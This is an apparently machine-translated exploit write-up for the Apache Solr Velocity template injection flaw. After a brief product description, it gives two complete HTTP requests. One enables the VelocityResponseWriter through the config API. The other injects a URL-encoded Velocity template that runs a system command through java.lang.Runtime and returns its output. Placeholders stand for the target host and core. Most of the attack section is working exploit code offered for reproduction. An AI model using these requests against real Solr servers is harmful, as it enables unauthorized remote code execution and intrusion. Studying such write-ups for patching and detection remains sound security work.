0x01 Solr brief
Solr is based on a popular Apache Lucene ™, fast, open source enterprise search platform.
Solr with high reliability, scalability and fault tolerance, distributed index may be provided, queries replication and load balancing, failover and automatic recovery, and the like centralized configuration. Solr to provide search and navigation capabilities for many of the world's largest Internet sites.
0x02 introduce vulnerabilities
The loophole is the Velocity module, which can be injected, the specific principles yet public. Its poc disclosed.
0x03 reproducible vulnerability
Thanks to a Gangster environment, save a little time.
- Open solr home page, click on the selector Core Selector , select this stuff (solr not familiar with, do not know how to define the properties of this thing), we call him $ name .
- Now construction poc, first write a configuration file
POST /solr/$name/config HTTP/1.1 Host: $target Pragma:no-cache Cache-Control:no-cache Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: https://$target/solr/ Content-Length: 259 { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }
- Happy contract in the past, success ~
- Write command execution
GET /solr/$name/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ls%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 Host:$target Pragma:no-cache Cache-Control:no-cache Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: https://$target/solr/ Content-Length: 259